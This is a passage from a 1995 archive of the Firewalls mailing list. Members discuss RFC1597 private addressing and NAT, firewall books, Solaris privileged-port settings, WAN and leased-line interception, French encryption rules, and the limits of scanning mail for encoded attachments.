adresses (class C?) to be 'translated' in a static way to the internal adresses of the servers to be reached from the outside world. The remaining part should make a 'pool' to be dedicated dynamically (only when needed) for those IP-hosts that need connection from the inside to the Internet. I am a relative new abonnee to this mailing list and I was glad to find RFC1597 is somewhat a 'hot topic'. MY QUESTION: Does someone works already in this way? I hope to get in contact with people that do have some working experience with the connection between their 10. network and the Internet. Although we intend to buy a commercial firewall, I'm also interested in the experiences of people with self-made firewalls. I don't know for sure that what follows is really allowed in this forum. If not, Brent Chapman should let me know and I won't do it again. I just do it because I find it an important matter and I want to know the opinion of other people dealing with Internet security. This is also completely my own opinion and not the one of my employer. I read RFC1627 and I am not happy with it. I will not discuss every item in it in this forum, although I think that this could be usefull. The authors claim that RFC1597 has 'not the benefit of the usual, public review and approval by the IETF or IAB'. Can someone tell me whether they did it better with RFC1627. If so, I will stop complaining in public about a RFC full of logic that I can not understand. I hope that the author's of both RFC's have been speaking with each other lately and come with a compromise (we like compromises in Belgium) . Maybe this is the revision of RFC1597 I read about in a note in this forum from Eliot Lear. I hope to find a reference to this new RFC in this forum. From firewalls-owner Mon Oct 2 06:00:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA18215 for firewalls-outgoing; Mon, 2 Oct 1995 05:56:53 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA18196 for ; Mon, 2 Oct 1995 05:56:48 -0700 Message-Id: <199510021256.FAA18196@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA031198509; Mon, 2 Oct 1995 22:55:09 +1000 From: Darren Reed Subject: Firewall-1: Patent-pending ? To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Mon, 2 Oct 1995 22:55:09 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 564 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This might be streching the charter a bit... In the advertising material for Checkpoint's Firewall-1 (version 1.2) which I picked up recently, there are two mentions of "patent pending". There is NO mention of any application numbers that I can find or any further information on this. Having sent e-mail to checkpoint last week and having received no reply (surprised - NOT) I'm wondering if this is just a game. Can anyone provide some more information about the pending patents, such as application numbers or the applications themselves ? Thanks, Darren From firewalls-owner Mon Oct 2 06:24:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA18078 for firewalls-outgoing; Mon, 2 Oct 1995 05:45:28 -0700 Received: from venera.isi.edu (venera.isi.edu [128.9.0.32]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA18071 for ; Mon, 2 Oct 1995 05:45:25 -0700 From: bmanning@ISI.EDU Received: from zed.isi.edu by venera.isi.edu (5.65c/5.61+local-22) id ; Mon, 2 Oct 1995 05:43:39 -0700 Posted-Date: Mon, 2 Oct 1995 05:40:33 -0700 (PDT) Message-Id: <199510021240.AA11534@zed.isi.edu> Received: by zed.isi.edu (5.65c/4.0.3-4) id ; Mon, 2 Oct 1995 05:40:34 -0700 Subject: Re: Book recommendations To: long-morrow@CS.YALE.EDU Date: Mon, 2 Oct 1995 05:40:33 -0700 (PDT) Cc: firewalls@GreatCircle.COM, mikes@emj.ca In-Reply-To: <199509291550.LAA17451@SPARKY.CF.CS.YALE.EDU> from "long-morrow@CS.YALE.EDU" at Sep 29, 95 11:50:21 am X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 793 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > There are 3 main books on Internet Firewalls currently available: > > 1. Bellovin and Cheswick, "Firewalls and Internet Security" > > 2. Siyan and Hare, "Internet Firewalls and Network Security ", New Riders Pub. > > 3. Chapman and Zwicky, "Building Internet Firewalls", O'Reilly & Associates > ( more info at URL http://www.greatcircle.com/firewalls-book/ ) > ISBN 1-56592-124-0, just released. > > I've also seen references (rumors?) on this list about an upcoming book > by Marcus Ranum and Tina Darmohra to be published by Prentice Hall. > Anyone care to confirm? > > - Morrow > A basic grounding in Network Security is useful -BEFORE- building a firewall. I recommend: Kaufman, Perlman, Speciner, "Network Security", Prentice Hall ISBN 0-13-061466-1 first. --bill From firewalls-owner Mon Oct 2 06:30:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA18112 for firewalls-outgoing; Mon, 2 Oct 1995 05:50:23 -0700 Received: from newt.fsa.ca (newt.fsa.ca [192.197.96.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA18105 for ; Mon, 2 Oct 1995 05:50:18 -0700 Received: from [192.197.96.201] (dansmac.fsa.ca [192.197.96.201]) by newt.fsa.ca (8.6.12/8.6.12) with SMTP id GAA02260; Mon, 2 Oct 1995 06:48:22 -0600 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 2 Oct 1995 06:52:48 -0600 To: eddiem@ad1.srv.ad.mey.nl, firewalls@GreatCircle.COM From: dan@fsa.ca (Dan Freedman) Subject: Re: PowerBroker Cc: jthimer@iras.ucalgary.ca (Jthimer ) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >When designing, implementing and running a firewall system, not only >technical problems come in to play. > >A firewall system can be considered as a single point of entry, which is >designed to provide adequate protection against the "bad boys" populating >the outside world. IT crime statistics however show that over 80% of all IT >fraud is committed by insiders. One should therefore also ensure that the >firewall is protected against insiders with bad intentions. One of a set of >measures to implement such protection is the application of the principle of >"segregation of duties" (also known as the "need to know" principle). The >idea is that it should NOT be possible for one person to completely manage >all parts of a gateway system. If implemented correctly, it takes at least >two persons to break the protection, which reduces the probability of IT >fraud occurring. > >Does anybody on the list have practical experience with the implementation >of this principle in a firewall environment? >Eddie Michiels >Moret Ernst & Young EDP Audit Management Services, Amsterdam >tel. 020 5497 208 You might want to take a look at FSA Corporation's PowerBroker software, which controls and logs access to the power of root across a UNIX network (soon to include NT as well). For more info on PowerBroker and other security software, please see http://www.fsa.ca or send email to sales@fsa.ca or call (403) 264 4822. Dan Freedman ______________________________________________________________________________ Dan Freedman, Director, FSA Corporation. 1011 First Street SW, suite 508, Calgary, Alberta, Canada T2R 1J2 phone (403) 264 4822, fax (403) 264 0873, email: dan@fsa.ca --->> FSA Corp WWW site: http://www.fsa.ca ______________________________________________________________________________ From firewalls-owner Mon Oct 2 06:52:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA19150 for firewalls-outgoing; Mon, 2 Oct 1995 06:42:22 -0700 Received: from chsun.eunet.ch (chsun.eunet.ch [146.228.10.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA19140 for ; Mon, 2 Oct 1995 06:42:16 -0700 Received: from mozart.UUCP by chsun.eunet.ch (8.6.10/1.34) id OAA05576; Mon, 2 Oct 1995 14:40:42 +0100 Received: from santana.ergon.ch by mozart.ergon.ch (4.1/ERGON) id AA08749; Mon, 2 Oct 95 14:18:35 +0100 Date: Mon, 2 Oct 95 14:18:35 +0100 From: sten@ergon.CH (Sten Gunterberg) Message-Id: <9510021318.AA08749@mozart.ergon.ch> To: firewalls@greatcircle.com Subject: Re: non-root low ports (was: Firewall on Solaris 2.4, truss, CERN httpd mods.) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > Am I correct in my understanding that on Unix systems the only reason > > root is needed at all on many of these network services is in order to > > open ports below 2000? This feature is intended to increase security > > somewhat on multi-user systems. But it seems that on firewalls, were > > you typically have no regular users, it's a prime suspect in > > _decreasing_ security by having all these daemons launched as root. > > Yes, the point of making root only able to bind to certain ports is for > security, 1-1023 are reserved by default.. Solaris has a kernel option > to let you change that number. > The following reports the (current) lowest port number usable without being root (default = 1024): ndd /dev/tcp tcp_smallest_nonpriv_port To redefine it to 21 (to enable the ftpd to run as non-root) use ndd -set /dev/tcp tcp_smallest_nonpriv_port 21 somewhere in the boot sequence. I suggest at the end of /etc/init.d/inetinit (this is linked to /etc/rc.2/S69inet). BTW, to see the TCP parameters Solaris 2.x provides: ndd /dev/tcp \? From firewalls-owner Mon Oct 2 07:22:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA20263 for firewalls-outgoing; Mon, 2 Oct 1995 07:02:48 -0700 Received: from balder.ssds.com (balder.ssds.com [204.131.72.62]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA20253 for ; Mon, 2 Oct 1995 07:02:44 -0700 Received: (from mail@localhost) by balder.ssds.com (8.6.9/8.6.9.SSDSnet-hub) id IAA14773; Mon, 2 Oct 1995 08:01:07 -0600 Received: from denver(134.127.16.1) by balder via smap (V1.3) id sma014764; Mon Oct 2 08:00:58 1995 Received: from baltimore.ssds.com (baltimore.ssds.com [134.127.34.1]) by denver.ssds.com (8.6.9/8.6.9.SSDSnet-hub) with ESMTP id IAA02536; Mon, 2 Oct 1995 08:00:56 -0600 Received: (from mam@localhost) by baltimore.ssds.com (8.6.9/8.6.9.SSDSnet-site) id KAA07678; Mon, 2 Oct 1995 10:00:54 -0400 Date: Mon, 2 Oct 1995 10:00:54 -0400 (EDT) From: Mike Malik -- Dover DE X-Sender: mam@baltimore To: Edward Maillet cc: firewalls@GreatCircle.COM Subject: Re: How secure is a WAN then? In-Reply-To: <9509300107.AA18383@doc.cs.usm.maine.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well their are several encryptors that work with frame-relay. (The process is actually simple encrypt everthing between the fr flags) But of course the U.S. Gov. might have ideas about who and where you can use them. Mike ( ( | ( Mike Malik (mam@ssds.com) ) ) (| ), inc. 9841 Broken Land Parkway,Suite 100 business driven Columbia, MD 21046 technology solutions 410-381-4313 FAX: 410-381-2170 From firewalls-owner Mon Oct 2 07:55:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA21376 for firewalls-outgoing; Mon, 2 Oct 1995 07:38:07 -0700 Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA21369 for ; Mon, 2 Oct 1995 07:38:03 -0700 From: gblolmxb@ibmmail.com Message-Id: <199510021438.HAA21369@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R2) with BSMTP id 1459; Mon, 02 Oct 95 10:35:57 EDT Date: Mon, 02 Oct 1995 10:39:45 EDT To: firewalls@GreatCircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank Willoughby wrote that when sending encrypted mail to a French destination, one must supply the French Gov. with a key. If I, based in London, England, were to send an encrypted (say using PGP with a 1024 bit key) to someone in France, and the French state found out, who would they prosecute? They cant touch me, and all the recipient has to prove is that the message was unsolicited - or am I missing something here? Mark Blackman. From firewalls-owner Mon Oct 2 08:00:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA21401 for firewalls-outgoing; Mon, 2 Oct 1995 07:38:42 -0700 Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA21394 for ; Mon, 2 Oct 1995 07:38:39 -0700 Received: from dtw-15.rust.net by Fe3.rust.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) id KAA13589; Mon, 2 Oct 1995 10:37:18 -0700 Date: Mon, 2 Oct 1995 10:37:18 -0700 Message-Id: <199510021737.KAA13589@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Edward Maillet From: janken@rust.net (Kenneth J. Stephens) Subject: Re: How secure is a WAN then? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >All the talk of ATM and stuff got me thinking about WANs in general. >Consider the following: >My company (me.com) has offices in Europe and headquaters in the US. If we use >didicated leased lines from the US to Europe (say from AT&T or MCI), can >someone in between get our data? >What about if used a "cloud" style network like ATM or Frame Relay which use >PVCs instead of dedicated curcuits? > >I have ofter wondered about this because a connection from say New York would >go thought NYNEX, MCI (or other), then France Telecom. That's three real big >uncontrolled portions of my Net. > >Any thoughts? (preferrably relating to the topic at hand and not just random >musings.) >----- Ed >maillet@cs.usm.maine.edu > I read Alan Hannan's post before adding this one (Outstanding Post by the way). One small question! Given the history of information interception in France, why would anyone believe France Telecom has any validity as a secure carrier? Encrypt, Encrypt, Encrypt if your data is at all important to your bottom line. Ken [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Ken Stephens Senior Capacity Planner/Data Security Officer [] [] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 [] [] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 [] [] 7th Fl. I.S. [] [] 7310 Woodward Ave [] [] Detroit, MI 48202 [] [] [] [] Millennium Consulting Your Security Policy is only [] [] 28234 Diesing Dr. as strong as your organization's [] [] Madison Heights, MI 48071 commitment to it. [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Mon Oct 2 08:30:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA23138 for firewalls-outgoing; Mon, 2 Oct 1995 08:22:03 -0700 Received: from LEVA.leeds.ac.uk (leva.leeds.ac.uk [129.11.240.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA23124 for ; Mon, 2 Oct 1995 08:21:57 -0700 Received: by leva.leeds.ac.uk (MX V4.1 VAX) id 1; Mon, 02 Oct 1995 16:21:01 BST Date: Mon, 02 Oct 1995 16:21:00 BST From: John Armstrong To: firewalls@greatcircle.com CC: john@leva.leeds.ac.uk Message-ID: <0099746B.86BCF016.1@leva.leeds.ac.uk> Subject: Brent's book Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know if has anything been decided about shipping Brent's new firewall book to non-US/Canada addresses - particularly to the UK? There was some correspondence (before the recent conference) on the list about sorting out shipping for us 'foreigners', but I havne't seen anything more recently. The order form in the Firewalls_Book.Txt file only mentions shipping within the US, as does the automated message from firewall-info. Do I have to get one of my US friends to buy the book and post it on to me or is something else in the pipeline? Thanks John Armstrong john@leva.leeds.ac.uk From firewalls-owner Mon Oct 2 08:30:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA22119 for firewalls-outgoing; Mon, 2 Oct 1995 07:57:01 -0700 Received: from airdata.com (nwestwall.nwest.airdata.com [199.33.218.36]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA22112 for ; Mon, 2 Oct 1995 07:56:58 -0700 Received: from nwestmail.airdata.com by airdata.com (5.0/McCaw WDD SUN nwestwall 070594/PHG) id AA12248; Mon, 2 Oct 1995 07:55:28 -0700 Received: from radiatore.mccaw-stg.com ([205.172.10.83]) by nwestmail.airdata.com (5.0/McCaw WDD SUN nwestmail 070594/PHG) id AA13726; Mon, 2 Oct 1995 07:55:27 -0700 X-Homepage: Visit our home page at http://www.airdata.com/ Received: by radiatore.mccaw-stg.com (5.x/SMI-SVR4) id AA02912; Mon, 2 Oct 1995 07:53:54 -0700 Date: Mon, 2 Oct 1995 07:53:54 -0700 From: peterg@airdata.com (Peter Gregory) Message-Id: <9510021453.AA02912@radiatore.mccaw-stg.com> To: firewalls@greatcircle.com Subject: Re: How secure is a WAN then? X-Sun-Charset: US-ASCII Content-Length: 463 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > My company (me.com) has offices in Europe and headquaters in the US. If we use > didicated leased lines from the US to Europe (say from AT&T or MCI), can > someone in between get our data? Absolutely. A CO switch at one of the local phone companies in this part of the country was broken into and dedicated circuits tapped and listened to. Because of this recent incident, my present client's "private" T1 circuits, therefore, are link-encrypted. Pete From firewalls-owner Mon Oct 2 09:00:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA24058 for firewalls-outgoing; Mon, 2 Oct 1995 08:42:51 -0700 Received: from hubbub.cisco.com (hubbub.cisco.com [198.92.30.32]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA24045 for ; Mon, 2 Oct 1995 08:42:46 -0700 Received: from puli.cisco.com (puli.cisco.com [171.69.1.174]) by hubbub.cisco.com (8.6.12/CISCO.GATE.1.1) with SMTP id IAA22930; Mon, 2 Oct 1995 08:40:37 -0700 Message-Id: <199510021540.IAA22930@hubbub.cisco.com> To: toon@cem-bb.e-mail.com cc: firewalls@greatcircle.com Subject: Re: RFC 1597 In-reply-to: Your message of "Mon, 02 Oct 95 08:33:01 EDT." <199510021231.FAA17889@miles.greatcircle.com> Date: Mon, 02 Oct 95 08:40:37 PDT From: Yakov Rekhter Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I really like the idea of what is proposed in RFC1597, this is (I think) > AT PRESENT (before the general implementation of IPv6, who knows when) > THE SOLUTION for small companies with a potential need for a lot of > IP-adresses (printers, LAN-print boxes, ... ). > To connect such a network to the Internet, I understand that one needs > the proper kind of firewall (dual-homed gateway, nice name). To make > this work perfect one would like to have the possibilty to reserve a > small part of the official adresses (class C?) to be 'translated' in a > static way to the internal adresses of the servers to be reached from > the outside world. The remaining part should make a 'pool' to be > dedicated dynamically (only when needed) for those IP-hosts that need > connection from the inside to the Internet. Static translation is one possibility. But it is not the only one. It is also possible to rely only on dynamic translation, but this would involve interaction between a NAT and DNS. > I read RFC1627 and I am not happy with it. I will not discuss every > item in it in this forum, although I think that this could be usefull. > The authors claim that RFC1597 has 'not the benefit of the usual, public > review and approval by the IETF or IAB'. Can someone tell me whether > they did it better with RFC1627. RFC1627 was not approved by the IETF. RFC1627 was not approved by the IAB. > If so, I will stop complaining in > public about a RFC full of logic that I can not understand. > I hope that the author's of both RFC's have been speaking with each > other lately and come with a compromise (we like compromises in Belgium) > . Maybe this is the revision of RFC1597 I read about in a note in this > forum from Eliot Lear. I hope to find a reference to this new RFC in > this forum. The document that Eliot was referrig to is presently an Internet Draft. (draft-ietf-cidrd-private-addr-03.txt). The CIDRD Working Group is working on moving this Internet Draft towards an RFC with the status of BCP (Best Current Practices). Yakov Rekhter From firewalls-owner Mon Oct 2 09:00:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA23545 for firewalls-outgoing; Mon, 2 Oct 1995 08:27:16 -0700 Received: from internet.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA23536 for ; Mon, 2 Oct 1995 08:27:06 -0700 Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id LAA09320; Mon, 2 Oct 1995 11:35:34 -0400 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id LAA08266 for ; Mon, 2 Oct 1995 11:25:42 -0400 Received: by metis.milkyway.com (8.6.12/BSDI-Client) id LAA08962; Mon, 2 Oct 1995 11:27:16 -0400 To: firewalls@greatcircle.com Path: not-for-mail From: mcr@milkyway.com (Michael Richardson) Newsgroups: milkyway.mail.firewalls Subject: Re: RFC 1597 Date: 2 Oct 1995 11:27:14 -0400 Organization: Milkyway Networks Corporation, Ottawa, ON Lines: 45 Distribution: milkyway Message-ID: <44p0ci$8nv@metis.milkyway.com> References: <199510021231.FAA17889@miles.greatcircle.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <199510021231.FAA17889@miles.greatcircle.com>, wrote: >the proper kind of firewall (dual-homed gateway, nice name). To make >this work perfect one would like to have the possibilty to reserve a >small part of the official adresses (class C?) to be 'translated' in a >static way to the internal adresses of the servers to be reached from >the outside world. The remaining part should make a 'pool' to be >dedicated dynamically (only when needed) for those IP-hosts that need >connection from the inside to the Internet. Well, an application layer gateway (and some filters) can provide simple translation to the IP of the firewall. It is trivial to decide to use another address, but you may *not* want to do this dynamically. Why? That gives no information to the remote machines about who is connecting via DNS. If you do not want to give them info, then use either the firewall itself (often called gateway.foo.com, or foo.com), or use some "typical" name like "marketing.foo.com" for all the PCs in marketing. The other reason not to dynamically allocate things is that it makes rules a pain. That isn't to say that you need to have a different IP for each utility device. (each printer). You might have 1 "printers.foo.com" (or service.foo.com) with rules that map 100 ports on that "virtual machine" to the correct lprXX.foo.com:515. Why you want people from the untrusted side to be able to print is not a question I'll ask right here :-) >MY QUESTION: Does someone works already in this way? Yes. >I read RFC1627 and I am not happy with it. I will not discuss every >item in it in this forum, although I think that this could be usefull. My feeling is some group of managers at large companies do not want to spend money on IPv6 now. If rfc1597 can avoid the crunch, they think, then do not spend money. 1627 is a respond from the engineering people who say (quite rightly) "you snooze, you loose" -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Mon Oct 2 09:30:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA25389 for firewalls-outgoing; Mon, 2 Oct 1995 09:23:34 -0700 Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA25374; Mon, 2 Oct 1995 09:23:27 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 2 Oct 1995 09:23:08 -0800 To: John Armstrong , firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Brent's book Cc: john@leva.leeds.ac.uk Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 4:21 PM 10/2/95, John Armstrong wrote: >Does anyone know if has anything been decided about shipping Brent's new >firewall book to non-US/Canada addresses - particularly to the UK? >There was some correspondence (before the recent conference) on the list >about sorting out shipping for us 'foreigners', but I havne't seen anything >more recently. The order form in the Firewalls_Book.Txt file only mentions >shipping within the US, as does the automated message from firewall-info. > >Do I have to get one of my US friends to buy the book and post it on to me >or is something else in the pipeline? I must apologize for the delay, to everyone outside the USA who has ordered a copy. We've only had the books for a little over a week, during which time I've been at 2 different conferences on different sides of the USA. Today is my first day in the office in 2+ weeks; unfortunately, my assistant, who has been doing all the research on international mailing options, won't be here until tomorrow. One of the first things on our agenda for tomorrow is to make a decision on how to ship the international orders. We've been having a hard time finding a reasonable option that looks like it will get the books there intact, in a timely fashion, for less than the price of the book. I don't know what my assistant has come up with in the last couple of weeks while I've been gone. Those who've placed international orders should expect to hear from us by email (assuming your email address was on the order) this week, either that the order has shipped, or offering a range of shipping options and asking which you prefer. By the way, all USA orders received prior to 25 Sep (last Monday) shipped on 25 Sep via US Postal Service Priority Mail (except for a couple of large orders, which shipped UPS). Everyone should probably have received their copy by now. We understand that the Postal Service may have mangled some of them; if so, let us know (email to "book-orders@greatcircle.com" is the best way, or call 800/270-2562), and we'll make it right. Orders placed last week (after 25 Sep) will be shipped this week. Thanks! -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Mon Oct 2 09:54:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26038 for firewalls-outgoing; Mon, 2 Oct 1995 09:38:20 -0700 Received: from alpha.fdu.edu (alpha.fdu.edu [132.238.2.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA26023 for ; Mon, 2 Oct 1995 09:38:11 -0700 Received: by alpha.fdu.edu; (5.65v3.0/1.1.8.2/27Sep95-0653PM) id AA01372; Mon, 2 Oct 1995 12:36:07 -0400 Date: Mon, 2 Oct 1995 12:36:07 -0400 (EDT) From: Steven ANQL Davey To: firewalls@greatcircle.com Subject: REQUEST FOR FIREWALL INFORMATION / DOCUMENTATION Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone please provide any information / documentation on the following firewall topics: 1.) Firewall Installation Master Plan. 2.) Firewall Installation Test Scripts. 3.) Firewall Trouble-shooting Procedures. 4.) Firewall Emergency Response Procedures. I realize that the details and specifics of this documentation may depend on the firewall to be, or already implemented; however, I am looking for general standards and templates as a starting point. Thank you in advance to those who can provide me with this information. Sincerely, Steven A.N.Q.L. Davey From firewalls-owner Mon Oct 2 10:00:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26108 for firewalls-outgoing; Mon, 2 Oct 1995 09:40:22 -0700 Received: from wrginet.corp.wrgrace.com (wrgrace.com [199.98.198.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA26101 for ; Mon, 2 Oct 1995 09:40:17 -0700 From: John.Karnes@corp.wrgrace.com Received: (from mail@localhost) by wrginet.corp.wrgrace.com (8.6.12/8.6.9) id MAA27481; Mon, 2 Oct 1995 12:36:14 -0400 Received: from s1boca.corp.wrgrace.com(159.97.11.20) by wrginet.corp.wrgrace.com via smap (V1.3) id sma027478; Mon Oct 2 12:35:47 1995 Received: from by s1boca.corp.wrgrace.com with SMTP (1.37.109.4/16.2) id AA19749; Mon, 2 Oct 95 12:38:49 -0400 X-Openmail-Hops: 1 Date: Mon, 2 Oct 95 12:38:27 -0400 Message-Id: Subject: RE: To: firewalls@GreatCircle.COM, gblolmxb@ibmmail.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Frank Willoughby wrote that when sending encrypted mail to a French > destination, one must supply the French Gov. with a key. If I, based > in London, England, were to send an encrypted (say using PGP with a > 1024 bit key) to someone in France, and the French state found out, > who would they prosecute? They cant touch me, and all the recipient > has to prove is that the message was unsolicited - or am I missing > something here? > > Mark Blackman. > While the government of France could not do much, if anything, to you, I'm sure they could make things unpleasant for the recipient. John From firewalls-owner Mon Oct 2 10:25:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA26005 for firewalls-outgoing; Mon, 2 Oct 1995 09:37:52 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA25998 for ; Mon, 2 Oct 1995 09:37:48 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7/res.host.cf-4.0) with ESMTP id MAA12529; Mon, 2 Oct 1995 12:16:49 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7/res.client.cf-4.0) id KAA26661; Mon, 2 Oct 1995 10:59:08 -0400 (EDT) Date: Mon, 2 Oct 1995 10:59:08 -0400 (EDT) Message-Id: <199510021459.KAA26661@SPARKY.CF.CS.YALE.EDU> To: chris@dejong.com, scorp@un.kiev.ua Subject: Re: Mail Proxy Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Tyler wrote: > >Slava Kritov writes: > >> Any uuencode ? >> Sorry, as a sysadm of 500+ orgs can say, that people sometimes exchange >> word docs in uuencode, and ( for Mac's ) you can't even say its word doc >> based on name ... > >Right... so? The purpose was to deny all attachments, whether word DOCs or executables. So >you look for the uuencode signature string and deny. But by only looking for the 'signature's of known binary encoding formats you then open yourself up for people to create their own encoding formats to get around your scan for, and restriction on encoded message enclosures. 3 possibilities for getting around a scan for known encoding signatures : 1. rot13 a uuencoded file before e-mailing it. Describe in the message how to unrot13 the message before uudecoding it. 2. Use an (admittedly) inefficient format for encoding binary, such as: RAVE AFRO STUB DAM HONE HAY CLAD WILL JOIN PET LONG WEED ... The recipient will need a decoder of course. 3. PGP encrypt the entire message before transmitting. How will the mail scanner know what is inside the message? Are you going to reject all encrypted messages? I think that encrypted messages will increasingly become the norm on the Internet as PC based mail programs incorporate automatic easy-to-use PGP encryption. - Morrow From firewalls-owner Mon Oct 2 10:30:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA25733 for firewalls-outgoing; Mon, 2 Oct 1995 09:32:44 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA25725 for ; Mon, 2 Oct 1995 09:32:40 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7/res.host.cf-4.0) with ESMTP id MAA12711; Mon, 2 Oct 1995 12:29:29 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7/res.client.cf-4.0) id LAA26704; Mon, 2 Oct 1995 11:11:49 -0400 (EDT) Date: Mon, 2 Oct 1995 11:11:49 -0400 (EDT) Message-Id: <199510021511.LAA26704@SPARKY.CF.CS.YALE.EDU> To: cosborn@bbn.com, firewalls@greatcircle.com Subject: Re: Running ftpd on another port Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I am trying to run 2 ftp servers on one machine. One fptd will always run >chroot and be used primarily for the public(wu-ftpd has all those nice >"features"). The other ftpd will be skey 